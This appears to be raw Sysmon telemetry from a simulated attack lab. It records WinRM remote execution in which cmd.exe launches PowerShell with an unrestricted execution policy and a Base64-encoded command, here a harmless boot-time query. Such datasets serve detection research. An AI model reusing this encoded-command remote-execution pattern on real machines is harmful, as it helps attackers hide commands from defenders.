12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-6497-6064-8400-00000000AE01}728736C:\Windows\system32\cmd.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.171{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-4335-070000000000}0x735430HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x80000000000000003418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-6497-6064-8300-00000000AE01}44724460C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-6497-6064-8200-00000000AE01}44324488C:\Windows\system32\WinrsHost.exe{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.164{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-4335-070000000000}0x735430HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.127{266CAFBE-646C-6064-1500-00000000AE01}13161696C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.111{266CAFBE-6497-6064-8300-00000000AE01}44724460C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.064{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 